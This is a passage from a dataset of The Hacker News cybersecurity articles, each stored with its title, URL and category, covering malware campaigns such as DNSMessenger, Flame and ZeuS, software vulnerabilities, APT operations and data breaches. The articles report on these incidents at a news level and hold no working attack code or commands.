holidays. The third-largest U.S. Retailer in which over 40 million Credit & Debit cards were stolen, used to pay for purchases at its 1500 stores nationwide in the U.S. Not Target alone, multiple retailers including Neiman Marcus, Michaels Store were also targeted involving the heist of possibly 110 million Credit-Debit cards, and personal information. Later, Target and other retailers confirmed that a malware was embedded in point-of-sale (POS) equipment at its checkout counters to collect secure data as the credit cards were swiped during transactions. That means the main theft resides in the company's POS system. The Book 'Hacking Point of Sale: Payment Application Secrets, Threats, and Solutions' is all about the In-Depth technical information of attacks and vulnerabilities in Point-of-sale (POS) system, along with the extensive knowledge about the mitigation and protection measures. THE BOOK WALKS THE READER THROUGH - Technological overview of Electronic payment systems POS applications architecture Communication protocols Attacks on Point-of-sale Systems Step-by-step explanation of credit card fraud processes POS payment application vulnerabilities and non-software attacks Weak Encryption mechanisms and Poor key management How to prevent attacks on payment applications using Cryptography How to Protect the cardholders' sensitive information How to protect the application itself by utilizing client and server certificates, digital signatures, and code obfuscation. From a security perspective, the most critical risk lies in the payment process, because if the information that the customers hand over is captured somehow, the cyber criminals can use it to commit credit card frauds. Also, many point-of-sale (POS) terminals are built using embedded versions of Microsoft Windows, which means that it is trivial for an attacker to create and develop malware that would run on a POS terminal. Attackers can also steal the information by leveraging the weakness in the point-of-sale (POS) environment such as unprotected memory, unencrypted network transmission, poorly encrypted disk storage, card reader interface, or compromised pinpad device. There are more than a billion active credit and debit card users in US alone, thus an active target for money motivated hackers. If we look at the figures, in 2011, POS terminals and payment card information was involved in almost 48% of security breaches which is more than any other data type breach. Due to lack of concern and security measures, point-of-sale (POS) systems have become an attractive target for cybercriminals and to overcome the upcoming threats we should know its architecture, the areas of attacks and the defense measures. Either you are a Developer, Security Architect , QA Analyst, Security Researcher or a Hacker, this book is really for you to grab the in-depth research of the point-of-sale (POS) systems, how it works, how it could be exploited, and what protection measures should be taken. The Publisher 'Wiley' is offering a special 50% Discount on 'Hacking Point of Sale' book only for 'The Hacker News' readers, so get your copy today. Stay Tuned! ",Vulnerability New Fileless Malware Uses DNS Queries To Receive PowerShell Commands,https://thehackernews.com/2017/03/powershell-dns-malware.html,"It is no secret that cybercriminals are becoming dramatically more adept, innovative, and stealthy with each passing day. While new forms of cybercrime are on the rise, traditional activities seem to be shifting towards more clandestine techniques that involve the exploitation of standard system tools and protocols, which are not always monitored. The latest example of such attack is DNSMessenger – a new Remote Access Trojan (RAT) that uses DNS queries to conduct malicious PowerShell commands on compromised computers – a technique that makes the RAT difficult to detect onto targeted systems. The Trojan came to the attention of Cisco's Talos threat research group by a security researcher named Simpo, who highlighted a tweet that encoded text in a PowerShell script that said 'SourceFireSux.' SourceFire is one of Cisco's corporate security products. DNSMessenger Attack Is Completely Fileless Further analysis of the malware ultimately led Talos researchers to discover a sophisticated attack comprising a malicious Word document and a PowerShell backdoor communicating with its command-and-control servers via DNS requests. Distributed through an email phishing campaign, the DNSMessenger attack is completely Fileless, as it does not involve writing files to the targeted system; instead, it uses DNS TXT messaging capabilities to fetch malicious PowerShell commands stored remotely as DNS TXT records. This feature makes it invisible to standard anti-malware defenses. PowerShell is a powerful scripting language built into Windows that allows for the automation of system administration tasks. The malicious Word document has been crafted ""to appear as if it were associated with a secure e-mail service that is secured by McAfee,"" according to a blog post published by Talos researchers Edmund Brumaghin and Colin Grady on Thursday. Here's How the DNSMessenger attack Works: When opened, the document launches a Visual Basic for Applications (VBA) macro to execute a self-contained PowerShell script in an attempt to run the backdoor onto the target system. What's interesting? Everything, until this point, is done in memory, without writing any malicious files to the system's disk. Next, the VBA script unpacks a compressed and sophisticated second stage of PowerShell, which involves checking for several parameters of the target environment, like the privileges of the logged-in user and the version of PowerShell installed on the target system. This information is then used to ensure persistence on the infected host by changing the Windows Registry and installing a third stage PowerShell script that contains a simple backdoor. The backdoor is being added to the Windows Management Instrumentation (WMI) database, if the victim does have administrative access, allowing the malware backdoor to stay persistent on the system even after a reboot. The backdoor is an additional script that establishes a sophisticated 2-way communications channel over the Domain Name System (DNS) – usually used to look up the IP addresses associated with domain names, but has support for different types of records. The DNSMessenger malware backdoor uses DNS TXT records that, by definition, allows a DNS server to attach unformatted text to a response. The backdoor periodically sends DNS queries to one of a series of domains hard-coded in its source code. As part of those requests, it retrieves the domain's DNS TXT record, which contains further PowerShell commands that are executed but never written to the local system. Now, this ""fourth stage"" Powershell script is the actual remote control tool used by the malware attacker. This script queries the command-and-control servers via DNS TXT message requests to ask what commands to execute. Any command received is then executed, and the output is communicated back to the C&C server, allowing the attacker to execute any Windows or application commands on the infected system. All attackers need to do is leave malicious commands and instructions inside the TXT records of their domains, which, when queried, is executed via the Windows Command Line Processor, and the output is sent back as another DNS query. The domains registered by the DNSMessenger RAT are all down, so till now, it is not known that what types of commands the attackers relayed to infected systems. However, the researchers say this particular RAT was used in a small number of targeted attacks. ""This malware sample is an excellent example of the length attackers are willing to go to stay undetected while operating within the environments that they are targeting,"" the Talos researchers said. ""It also illustrates the importance that in addition to inspecting and filtering network protocols such as HTTP/HTTPS, SMTP/POP3, etc. DNS traffic within corporate networks should also be considered a channel that an attacker can use to implement a fully functional, bidirectional C2 infrastructure."" This is not the first time when the researchers came across a Fileless malware. At early last month, Kaspersky researchers also discovered fileless malware, that resides solely in the memory of the compromised computers, targeting banks, telecommunication companies, and government organizations in 40 countries. ",Malware Remote Execution Flaw Threatens Apps Built Using Spring Framework — Patch Now,https://thehackernews.com/2018/04/spring-framework-hacking.html,"Security researchers have discovered three vulnerabilities in the Spring Development Framework, one of which is a critical remote code execution flaw that could allow remote attackers to execute arbitrary code against applications built with it. Spring Framework is a popular, lightweight and an open source framework for developing Java-based enterprise applications. In an advisory released today by Pivotal, the company detailed following three vulnerabilities discovered in Spring Framework versions 5.0 to 5.0.4, 4.3 to 4.3.14, and older unsupported versions: Critical: Remote Code Execution with spring-messaging (CVE-2018-1270) High: Directory Traversal with Spring MVC on Windows (CVE-2018-1271) Low: Multipart Content Pollution with Spring Framework (CVE-2018-1272) Vulnerable Spring Framework versions expose STOMP clients over WebSocket endpoints with an in-memory STOMP broker through the 'spring-messaging' module, which could allow an attacker to send a maliciously crafted message to the broker, leading to a remote code execution attack (CVE-2018-1270). ""The use of authentication and authorization of messages, such as the one provided by Spring Security, can limit exposure to this vulnerability only to users who are allowed to use the application,"" the company suggests. The second bug (CVE-2018-1271) resides in Spring's Web model-view-controller (MVC) that allows attackers to execute directory traversal attack and access restricted directories when configured to serve static resources (e.g., CSS, JS, images) from a file system on Windows. This vulnerability doesn't work if you are not using Windows to serve content and can be avoided if you don't serve files from the file system or use Tomcat/WildFly as the server. Pivotal has released Spring Framework 5.0.5 and 4.3.15, which include fixes for all the three vulnerabilities. The company has also released Spring Boot 2.0.1 and 1.5.11, that match the patched Spring Framework versions. So developers and administrators are highly recommended to upgrade their software to the latest versions immediately. ",Vulnerability Unpatched Python and Java Flaws Let Hackers Bypass Firewall Using FTP Injection,https://thehackernews.com/2017/02/python-java-ftp-protocol-injection.html,"This newly discovered bugs in Java and Python is a big deal today. The two popular programming languages, Java and Python, contain similar security flaws that can be exploited to send unauthorized emails and bypass any firewall defenses. And since both the flaws remain unpatched, hackers can take advantage to design potential cyber attack operations against critical networks and infrastructures. The unpatched flaws actually reside in the way Java and Python programming languages handle File Transfer Protocol (FTP) links, where they don't syntax-check the username parameter, which leads to, what researchers call, protocol injection flaw. Java/Python FTP Injection to Send Unauthorized SMTP Emails In a blog post published over the past week, security researcher Alexander Klink detailed the FTP protocol injection vulnerability in Java's XML eXternal Entity (XXE) that allows attackers to inject non-FTP malicious commands inside an FTP connection request. To demonstrate the attack, Alexander showed how to send an unauthorized email via SMTP (Simple Mail Transfer Protocol) in an FTP connection attempt, even though the FTP connection failed, as FTP servers does support authentication, but doesn't check for the present of carriage returns (CR) or line feeds (LF) in usernames. ""This attack is particularly interesting in a scenario where you can reach an (unrestricted, maybe not even spam- or malware-filtering) internal mail server from the machine doing the XML parsing,"" Alexander concluded. Java/Python FTP Injections Allow to Bypass Firewall However, two days later in a separate security advisory, security researcher Timothy Morgan from Blindspot Security came forward with his findings, showing more threatening exploitation scenario where the FTP URL handlers in both Java and Python can be used to bypass firewalls. Morgan said such FTP protocol injection flaw could be used to trick a victim's firewall into accepting TCP connections from the web to the vulnerable host's system on its ""high"" ports (from 1024 to 65535). Besides the FTP protocol injection attack, there's reside a decade old security issue in FTP protocol called classic mode FTP – an insecure mechanism of client-server FTP interactions, but many firewall vendors still support it by default. When a classic mode FTP connection is initiated, the firewall temporarily opens a port – typically between 1024 and 65535 – specified in the PORT command, which introduces security risks. Using the FTP protocol injection issue in Java and Python, an attacker who knows the targeted host's internal IP address can start a classic mode FTP connection, which attackers can use for nefarious purposes. Morgan has determined that an attacker can open up one port in the targeted firewall with only three requests: Identify the victim's internal IP address – this requires an attacker to ""send an URL, see how the client behaves, then try another until the attack is successful."" Determine packet alignment and ensure that the PORT command is injected at the right moment, making the attack work. Exploit the vulnerability. Each additional request can be used to open up another TCP port. Easily Exploitable Protocol Injection Flaw However, the researcher warned that his exploit could be used for man-in-the-middle (MitM) attacks, server-side request forgery (SSRF), an XEE attack and more – and once bypassed the firewall, desktop hosts can be attacked even if they do not have Java installed. All an attacker need is to convince victims into accessing a malicious Java or Python applications installed on a server to bypass the entire firewall. ""If a desktop user could be convinced to visit a malicious website while Java is installed, even if Java applets are disabled, they could still trigger Java Web Start to parse a JNLP (Java Network Launch Protocol) file,"" Morgan said. ""These files could contain malicious FTP URLs which trigger this bug."" ""Also note, that since Java parses JNLP files before presenting the user with any security warnings, the attack can be entirely successful without any indication to the user (unless the browser itself warns the user about Java Web Start being launched)."" According to Morgan, a nearly identical flaw also exists in Python's urllib2 and urllib libraries, although ""this injection appears to be limited to attacks via directory names specified in the URL."" Protocol Injection Flaw Is Still Unpatched Morgan said the FTP protocol injection flaw was reported to the Python team in January 2016 and Oracle in November 2016 by his company, but neither of the two has issued any update to address the issue. Morgan has developed a proof-of-concept (PoC) exploit but is currently holding back publication of his exploit until Oracle and Python respond to the disclosure and release patches. The Morgan's exploit has successfully been tested against Palo Alto Networks and Cisco ASA firewalls, though researchers believe many commercial firewalls are also vulnerable to FTP stream injection attacks. So until patches become available, Morgan suggests users uninstall Java on their desktops and in browsers, as well as disable support for ""classic mode"" FTP on all firewalls. ",Cyber_Attack Iframe Injection & Blind SQL Injection vulnerability on Apple.com exposed by Idahc(lebanese hacker),https://thehackernews.com/2011/07/iframe-injection-blind-sql-injection.html,"Iframe Injection & Blind SQL Injection vulnerability on Apple.com exposed by Idahc(lebanese hacker) After Sony hacks, Idahc(lebanese hacker) is back to strike Apple.com . He found two vulnerability on https://consultants.apple.com/ as listed below. Iframe Injection : Click here Blind SQL INjection: Click Here Examples of the injections: Example One Example two Two days before Another sub-domain of Apple's database was hacked with SQL injection by Anonymous : Read Here Hacker Expose the Database ,extracted using Blind Sql injection on a pastebin link. According to Hacker ""I am Idahc(lebanese hacker) I found a Blind SQLI and Iframe Injection on AppleI am not one of Anonymous or Lulzsecand I am against The ANTISEC OPERATIONBUt this is a poc with not confidential informationI didn't dump users,emails,passwords........"". ",Vulnerability WildPressure APT Emerges With New Malware Targeting Windows and macOS,https://thehackernews.com/2021/07/wildpressure-apt-emerges-with-new.html,"A malicious campaign that has set its sights on industrial-related entities in the Middle East since 2019 has resurfaced with an upgraded malware toolset to strike both Windows and macOS operating systems, symbolizing an expansion in both its targets and its strategy around distributing threats. Russian cybersecurity firm attributed the attacks to an advanced persistent threat (APT) it tracks as ""WildPressure,"" with victims believed to be in the oil and gas industry. WildPressure first came to light in March 2020 based off of a malware operation distributing a fully-featured C++ Trojan dubbed ""Milum"" that enabled the threat actor to gain remote control of the compromised device. The attacks were said to have begun as early as August 2019. ""For their campaign infrastructure, the operators used rented OVH and Netzbetrieb virtual private servers (VPS) and a domain registered with the Domains by Proxy anonymization service,"" Kaspersky researcher Denis Legezo noted last year. Since then, new malware samples used in WildPressure campaigns have been unearthed, including a newer version of the C++ Milum Trojan, a corresponding VBScript variant with the same version number, and a Python script named ""Guard"" that works across both Windows and macOS. The Python-based multi-OS Trojan, which extensively makes of publicly available third-party code, is engineered to beacon the victim machine's hostname, machine architecture, and OS release name to a remote server and check for installed anti-malware products, following which it awaits commands from the server that allow it to download and upload arbitrary files, execute commands, update the Trojan, and erase its traces from the infected host. The VBScript version of the malware, named ""Tandis,"" features similar capabilities to that of Guard and Milum, while leveraging encrypted XML over HTTP for command-and-control (C2) communications. Separately, Kaspersky said it found a number of previously unknown C++ plugins that have been used to gather data on infected systems, such as recording keystrokes and capturing screenshots. What's more, in what appears to be an evolution of the modus operandi, the latest campaign — besides relying on commercial VPS — also weaved compromised legitimate WordPress websites into their attack infrastructure, with the websites serving as Guard relay servers. To date, there's neither clear visibility regarding the malware spreading mechanism nor any strong code- or victim-based similarities with other known threat actors. However, the researchers said they spotted minor ties in the techniques used by another adversary called BlackShadow, which also operates in the same region. The ""tactics aren't unique enough to come to any attribution conclusion – it's possible both groups are simply using the same generic techniques and programming approaches,"" Legezo said. ",Cyber_Attack New Android malware forwards incoming messages to hacker,https://thehackernews.com/2013/05/android-malware-that-sends-incoming.html,"A new type of Android malware that can intercept text messages and forwarding to hackers is discovered by the Russian firm Doctor Web. This is a very serious threat to users, because using this malware attackers can easily get two factor authentication code of your Email or bank accounts. The malware, dubbed as Android.Pincer.2.origin, is the second form of the original Android.Pincer malware and is distributed as security certificates that the user must install. Upon launching Android.Pincer.2.origin, the user will see a fake notification about the certificate's successful installation but after that, the Trojan will not perform any noticeable activities for a while. Android.Pincer.2.origin connects to a server and send text messages in addition to the other information as the smartphone model, serial, IMEI and phone number and the Android version is used. To malware then receive instructions from commands in the following format: start_sms_forwarding [telephone number] - begin intercepting communications from a specified number stop_sms_forwarding - stop intercepting messages send_sms [phone number and text] - send a short message using the specified parameters simple_execute_ussd - send a USSD message stop_program - stop working show_message - display a message on the screen of the mobile device set_urls - change the address of the control server ping - send an SMS containing the text 'pong' to a previously specified number set_sms_number - change the number to which messages containing the text string 'pong' are sent. The command start_sms_forwarding is of particular interest since it allows attackers to indicate the number from which the Trojan needs to intercept messages. This feature enables criminals to use the Trojan for targeted attacks and steal specific messages. ",Malware Chinese Hackers Target Air-Gapped Networks in Southeast Asia,https://thehackernews.com/2015/04/a-state-sponsored-cyber-espionage-group.html,"A State-sponsored Cyber Espionage Group -- most likely linked to the Chinese government becomes the first group to target the so-called ""Air-Gapped Networks"" that aren't directly connected to the Internet. What are Air-Gapped systems? Air-gapped systems are known to be the most safest and secure systems on the earth. These systems are isolated from the Internet or any other Internet-connected computers or external networks. Air-gapped systems are generally used in the critical situations that demand high security like in payment networks to process debit and credit card transactions, military networks, and in industrial control systems that operate critical infrastructure of the Nation. Why Air-Gapped? It is very difficult to siphon data from Air-Gapped systems because it requires a physical access to the target system or machine in order to do that and gaining physical access is possible only by using removable devices such as a firewire cable or a USB flash drive. Now: Since 2005, a Chinese Hacking Group has been spying dedicatedly on Governments, Companies & Journalists in Southeast Asia, India, & other countries, according to FireEye. In a 69-page technical report, FireEye said the Chinese cyber espionage operations went undetected for the last ten years, conducted by a team of highly skilled hackers, dubbed APT30 (Advanced Persistent Threat). Now here's the deal: The APT30 Group is particularly interested in stealing information related to: Regional Political Disputed Territories Military and Economic issues Media Organizations and journalists Political Developments in Southeast Asia and India ""APT30's attempts to compromise journalists and media outlets could also be used to punish outlets that do not provide favorable coverage – for example, both the New York Times and Bloomberg have had trouble securing visas for journalists in wake of unfavorable corruption reporting,"", the report said. This isn't enough: The group has reportedly developed a number of secret hacking tools and backdoors [MILKMAID, ORANGEADE Droppers, CREAMSICLE Downloader, BACKBEND, GEMCUTTER Downloaders] over the period of last ten years and infected victims using Phishing and Social Engineering attacks. However, the Capability to infiltrating air gapped systems makes the APT30 hacking group more sophisticated in nature. In order to hack into an air-gapped computer, the group tricked their victims into downloading malware on their home computers. ""APT30 uses three pieces of malware [SHIPSHAPE, SPACESHIP, FLASHFLOOD] that are believed to have been designed to propagate to removable drives with the intent of eventually infecting and stealing data from computers located on air-gapped networks."" The Malware, designed with worm-like capabilities, can infect removable drives such as USB sticks and hard drives. Those devices can transfer the malware if later plugged into the secure networks. TARGETED COUNTRIES The countries primarily targeted were: India Malaysia Vietnam Thailand South Korea Nepal Bhutan Philippines Singapore Saudi Arabia Indonesia Japan Brunei Myanmar Laos Cambodia The Government of China has consistently denied these claims, arguing ""cybercrime is a global problem."" ",Malware U.S. Recovers $2.3 Million Ransom Paid to Colonial Pipeline Hackers,https://thehackernews.com/2021/06/us-recovers-23-million-ransom-paid-to.html,"In a major blow, the U.S. Department of Justice on Monday said it has recovered 63.7 bitcoins (currently valued at $2.3 million) paid by Colonial Pipeline to the DarkSide ransomware extortionists on May 8, pursuant to a seizure warrant that was authorized by the Northern District of California. The ransomware attack also hobbled the pipeline company's fuel supply, prompting the government to issue an emergency declaration, even as the company shelled out a ransom amount of approximately 75 bitcoins ($4.4 million as of May 8) to regain access to its systems. A week after the highly publicized incident, the ransomware-as-a-service syndicate disbanded with a May 14 farewell message to affiliates, stating that its internet servers and cryptocurrency stash were seized by unknown law enforcement entities. While DarkSide's announcement was perceived as an exit scam, the latest move from DoJ confirms earlier speculations of law enforcement involvement. Stating that ""ransom payments are the fuel that propels the digital extortion engine,"" the DoJ said it followed the money trails left by the DarkSide gang to a specific bitcoin address by reviewing the Bitcoin public ledger, to which the proceeds of the ransom payment were transferred, ultimately using the ""private key"" the FBI had in its possession to access crypto assets stored in the wallet in question. ""There is no place beyond the reach of the FBI to conceal illicit funds that will prevent us from imposing risk and consequences upon malicious cyber actors,"" said FBI Deputy Director Paul Abbate. ""We will continue to use all of our available resources and leverage our domestic and international partnerships to disrupt ransomware attacks and protect our private sector partners and the American public."" It's not immediately clear how the intelligence agency came to have the private key, but DarkSide had previously claimed to have lost access to one of their payment servers. Blockchain analytics firm Elliptic, which had identified the bitcoin transaction representing the Colonial Pipeline ransom payment, said the seized bitcoins represent 85% of the total ransom amount which is typically reserved for affiliates, with the rest going to the DarkSide developers. The Bitcoin address was emptied at around 1:40 p.m. ET on Monday, Dr. Tom Robinson, Elliptic's co-founder and chief scientist, said. If anything, the seizure marks a first-of-its-kind orchestrated effort led by the DoJ's newly formed Ransomware and Digital Extortion Task Force to confiscate a cybercriminal cartel's illicit profits by breaking into its bitcoin wallet using its private key likely stored in the seized servers, as implied in the warrant. ""Holding cyber criminals accountable and disrupting the ecosystem that allows them to operate is the best way to deter and defend against future attacks of this nature,"" Colonial Pipeline CEO Joseph Blount said in the statement. ""The private sector also has an equally important role to play and we must continue to take cyber threats seriously and invest accordingly to harden our defenses."" ",Cyber_Attack Warning: Beware of Post-Election Phishing Emails Targeting NGOs and Think Tanks,https://thehackernews.com/2016/11/election-trump-phishing-malware.html,"Just a few hours after Donald Trump won the 2016 US Presidential Election, a hacking group launched a wave of cyber attacks targeting U.S.-based policy think-tanks with a new spear phishing campaign designed to fool victims into installing malware. The group of nation-state hackers, also known as Cozy Bear, APT29, and CozyDuke, is the one of those involved in the recent data breach of the Democratic National Committee (DNC) and is allegedly tied to the Russian government. On Wednesday, the hackers sent a series of phishing emails to dozens of targets associated with non-governmental organizations (NGOs), policy think tanks in the US and even inside the US government, said security firm Volexity. Phishing Attacks Powered by 'PowerDuke' Malware The phishing emails were sent from purpose-built Gmail accounts and other compromised email accounts at Harvard University's Faculty of Arts and Sciences (FAS), trying to trick victims into opening tainted attachments containing malware and clicking on malicious links. Once this was done, the phishing e-mail dropped a new variant of Backdoor malware, dubbed ""PowerDuke,"" giving attackers remote access to the compromised systems. PowerDuke is an extremely sophisticated piece of malware in both its way of infecting people as well as concealing its presence. Besides making use of wide variety of approaches, PowerDuke uses steganography to hide its backdoor code in PNG files. The firm spotted and reported at least five waves of phishing attacks targeting people who work for organizations, including Radio Free Europe/Radio Liberty, the RAND Corporation, the Atlantic Council, and the State Department, among others. ""Three of the five attack waves contained links to download files from domains that the attackers appear to have control over,"" the firm said in a blog post. ""The other two attacks contained documents with malicious macros embedded within them. Each of these different attack waves was slightly different from one another."" Beware of Post-Election Themed Phishing Emails All the phishing emails were election-themed. Why? After Trump won the US presidential election, half of America, as well as people across the world, mourning the result was curious to know about the victory of Trump. People even started searching on Google: How did Donald Trump win the US presidential election?, Were the election flawed? Why did Hillary Clinton lose? Hackers took advantage of this curiosity to target victims, especially those who worked with the United States government and were much more concerned about Trump's victory. Two of the emails claimed to have come from the Clinton Foundation giving insight of the elections, two others purported to be documents pertaining to the election's outcome being revised or rigged, and the last one offered a link to a PDF download on 'Why American Elections Are Flawed.' The emails were sent using the real email address of a professor at Harvard, which indicates that the hackers likely hacked the professor's email and then used his account to send out the phishing emails. The emails either contained malicious links to .ZIP files or included malicious Windows shortcut files linked to a ""clean"" Rich Text Format document and a PowerShell script. Once clicked, the script installed PowerDuke on a victim's computer that could allow attackers to examine and control the target system. The malware has the capability to secretly download additional malicious files and evade detection from antivirus products. Security firm CrowdStrike claimed in June 2016 that the hacking team Cozy Bear has previously hacked into networks belonging to the White House, State Department, and the United States Joint Chiefs of Staff. ",Cyber_Attack Legacy Native Malware in Angry Birds Space to pwn your Android !,https://thehackernews.com/2012/04/legacy-native-malware-in-angry-birds.html,"Legacy Native Malware in Angry Birds Space to pwn your Android A new malware threatens phones and tablets running Google's OS by hiding inside a copy of the popular game. Researchers at the mobile security firm Lookout identified the reworked malware as Legacy Native (LeNa), which poses as a legitimate app to gain unauthorized privileges on Android phones. Under the appearance of a legitimate application, LeNa tricked users into allowing it access to information. ""By employing an exploit, this new variant of LeNa does not depend on user interaction to gain root access to a device. This extends its impact to users of devices not patched against this vulnerability (versions prior to 2.3.4 that do not otherwise have a back-ported patch),"" Lookout said in a blog post. In March, another Trojan appeared pretending to be legitimate Chinese game, The Roar of the Pharaoh. The malicious app appeared on the Google Play store, stealing users' data and money by sending SMS messages to premium-rate numbers without the owner's knowledge. One binary exploits the GingerBreak vulnerability to drop and launch the second, an updated version of LeNa. This payload communicates with a remote Command and Control server and accepts instructions to install additional packages and push URLs to be displayed in the browser. The malware connects to remote servers in order to send sensitive phone information and to install malicious software on the infected handset. The new LeNa seems like a fully functional copy of popular apps, like ""Angry Birds Space,"" and, according to Lookout, ""hides its malicious payload in the string of code at the end of an otherwise genuine JPEG file."" Well ! Before you download any app, check the permissions it requests, if you're uncomfortable with the amount of access to your phone an app wants, don't download it. For now, Android users who are only downloading apps from Google Play (Android Market) are safe. The new version of LeNa has been spotted on third-party Chinese app websites. ",Malware Flame spy virus going to Suicide,https://thehackernews.com/2012/06/flame-spy-virus-going-to-suicide.html,"Flame spy virus going to Suicide The creators of the world's most complicated espionage virus Flame have sent a 'suicide' command that removes it from some infected computers. U.S. computer security researchers said on Sunday that the Flame computer virus, which struck at least 600 specific computer systems in Iran, Syria, Lebanon, Egypt, Sudan, Saudi Arabia and the Palestinian Authority, has gotten orders to vanish, leaving no trace. The 20-megabyte piece of malware already had a self-destruct module known as SUICIDE that removed all files and folders associated with Flame, but the purging command observed by Symantec researchers instead relied on a file called browse23.ocx that did much the same thing. According to Symantec, the 'suicide' command was ""designed to completely remove Flame from the compromised computer,"" the BBC reports. Computers infected with Flame, including honeypots, have been routinely contacting its C&C servers to check for new commands. When the C&C servers still owned by Flame's authors recently sent out a self-destruct code, Symantec detected the command immediately. Flame was designed to suck information from computer networks and relay what it learned back to those controlling the virus. It can record keystrokes, capture screen images, and eavesdrop using microphones built into computers. Bots have long contained such self-destruct mechanisms, so it's not surprising that malware as complex and comprehensive as Flame would, too. ",Malware Experian South Africa Suffers Data Breach Affecting Millions; Attacker Identified,https://thehackernews.com/2020/08/experian-data-breach-attack.html,"The South African arm of one of the world's largest credit check companies Experian yesterday announced a data breach incident that exposed personal information of millions of its customers. While Experian itself didn't mention the number of affect customers, in a report, the South African Banking Risk Information Centre—an anti-fraud and banking non-profit organization who worked with Experian to investigate the breach—disclosed that the attacker had reportedly stolen data of 24 million South Africans and 793,749 business entities. Notably, according to the company, the suspected attacker behind this breach had already been identified, and the stolen data of its customers had successfully been deleted from his/her computing devices. ""We have identified the suspect and confirm that Experian South Africa was successful in obtaining and executing an Anton Piller order which resulted in the individual's hardware being impounded and the misappropriated data being secured and deleted."" Experian South Africa has already reported the breach to law enforcement and the appropriate regulatory authorities. The company claims there is no evidence indicating whether the stolen data includes consumers' credit or financial information or used for fraudulent purposes before authorities had it deleted. ""Our investigations also show that the suspect had intended to use the data to create marketing leads to offer insurance and credit-related services."" ""The compromise of personal information can create opportunities for criminals to impersonate you but does not guarantee access to your banking profile or accounts. However, criminals can use this information to trick you into disclosing your confidential banking details,"" says SABRIC CEO, Nischal Mewalall. Besides releasing this information, SAFPS also recommended that credit reporting agency customers should immediately apply for a free Protective Registration listing with Southern Africa Fraud Prevention Service that has been designed to alert users when their identity is compromised. You can also regularly check your credit report for free here. ",Data_Breaches Hackers Exploit VPN to Deploy SUPERNOVA malware on SolarWinds Orion,https://thehackernews.com/2021/04/hackers-exploit-vpn-flaw-to-deploy.html,"The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has disclosed details of a new advanced persistent threat (APT) that's leveraging the Supernova backdoor to compromise SolarWinds Orion installations after gaining access to the network through a connection to a Pulse Secure VPN device. ""The threat actor connected to the entity's network via a Pulse Secure virtual private network (VPN) appliance, moved laterally to its SolarWinds Orion server, installed malware referred to by security researchers as SUPERNOVA (a .NET web shell), and collected credentials,"" the agency said on Thursday. CISA said it identified the threat actor during an incident response engagement at an unnamed organization and found that the attacker had access to the enterprise's network for nearly a year through the use of the VPN credentials between March 2020 and February 2021. Interestingly, the adversary is said to have used valid accounts that had multi-factor authentication (MFA) enabled, rather than an exploit for a vulnerability, to connect to the VPN, thus allowing them to masquerade as legitimate teleworking employees of the affected entity. In December 2020, Microsoft disclosed that a second espionage group may have been abusing the IT infrastructure provider's Orion software to drop a persistent backdoor called Supernova on target systems. The intrusions have since been attributed to a China-linked threat actor called Spiral. Unlike Sunburst and other pieces of malware that have been connected to the SolarWinds compromise, Supernova is a .NET web shell implemented by modifying an ""app_web_logoimagehandler.ashx.b6031896.dll"" module of the SolarWinds Orion application. The modifications were made possible by leveraging an authentication bypass vulnerability in the Orion API tracked as CVE-2020-10148, in turn permitting a remote attacker to execute unauthenticated API commands. An investigation into the incident is ongoing. In the meantime, CISA is recommending organizations to implement MFA for privileged accounts, enable firewalls to filter unsolicited connection requests, enforce strong password policies, and secure Remote Desktop Protocol (RDP) and other remote access solutions. ",Malware ZeuS Botnet Updating Infected Systems with Rootkit-Equipped Trojan,https://thehackernews.com/2014/04/zeus-banking-trojan-botnet-rootkit-malware.html,"ZeuS, or Zbot is one of the oldest families of financial malware, it is a Trojan horse capable to carry out various malicious and criminal tasks and is often used to steal banking information. It is distributed to a wide audience, primarily through infected web pages, spam campaigns and drive-by downloads. Earlier this month, Comodo AV labs identified a dangerous variant of ZeuS Banking Trojan which is signed by stolen Digital Certificate belonging to Microsoft Developer to avoid detection from Web browsers and anti-virus systems. FREE! FREE! ZeuS BRINGS ROOTKIT UPDATE Recently, the security researcher, Kan Chen at Fortinet has found that P2P Zeus botnet is updating its bots/infected systems with updates version that has the capability to drop a rootkit into infected systems and hides the trojan to prevent the removal of malicious files and registry entries. The new variant also double check for the earlier installed version (0x38) of ZeuS trojan on the infected system and then replaces it with updated binary files (0X3B version). ""Every P2P Zeus binary would extract the version number from the update packet and compare the version number that is hardcoded in its body"" to verify the success of update process. According to researchers, there is only a minimal change in the new variant of P2P Zeus as the new binary also drops a rootkit driver file into the %SYSTEM32%\drivers folder, apart from its original functions. New Zeus Trojan equipped with rootkit feature makes it more sophisticated and increases the difficulty of removing Zeus from infected systems. HOW TO PROTECT YOURSELF FROM ZeuS TROJAN We recommend users to use common sense and think twice before giving a click to any link on their e-mails or at any other websites they visit. Trustworthy companies don't send attachments unless you have requested specific documents. So, always use caution if you receive any email from an unknown contact with attachments that you haven't requested and do not bother to open it. Install a best Internet Security Tool and Configure the firewall to maximize the security of your computer system. ",Malware DarkBot Malware Circulation very fast via Skype,https://thehackernews.com/2012/10/darkbot-malware-circulation-very-fast.html,"Two weeks back we reported that Security firm Trend Micro discovered a worm targeting Skype users with spam messages designed to infect machines with the Dorkbot ransomware has been discovered. This malware is spreading through a question/ phrase sent to the users by someone and the question is: ""lol is this your new profile pic?"" Yesterday Security researchers from Avast have intercepted a currently spreading Darkbot malware campaign, that's affecting millions of Skype users. According to him,"" It targets all the major Web browsers, and is also capable of distributing related malware such as Ransomware/LockScreen, as well as steal accounting data for major social networking services such as Facebook, Twitter, as well as related services such as GoDaddy, PayPal and Netflix."" Some of the infected PCs install the malware known as ransomeware which locks your PC and ask you to pay $200 dollars within 48 hours to retrieve your files. ""If you click on the link, your infected computer becomes part of a botnet, or a network of computers controlled by hackers to execute DDoS (distributed denial of service) attacks. A DDoS attack causes the site or service to be temporarily unavailable by flooding the targeted website with traffic until the site's servers are overloaded."" Initially only 2 of the present 44 antivirus engines identified the threat, but currently the number has increased to 27, which is still quite low. However, it also indicates that about 1 Million users must have clicked o the links and greeted infection on the links. Users are advised to ensure that they're running the latest version of their third-party software, browser plugins, ensure that the URL they're about to click on hasn't already been flagged as malicious, and take advantage of application sandboxing techniques to avoid direct exploitation of their host. ",Malware The Hacker News Hacking Awards : Best of Year 2011,https://thehackernews.com/2012/01/hacker-news-hacking-awards-best-of-year.html,"The Hacker News Hacking Awards : Best of Year 2011 2011 has been labeled the ""Year of the Hack"" or ""Epic #Fail 2011"". Hacking has become much easier over the years, which is why 2011 had a lot of hacking for good and for bad. Hackers are coming up with tools as well as finding new methods for hacking faster then companies can increase their security. Every year there are always forward advancements in the tools and programs that can be used 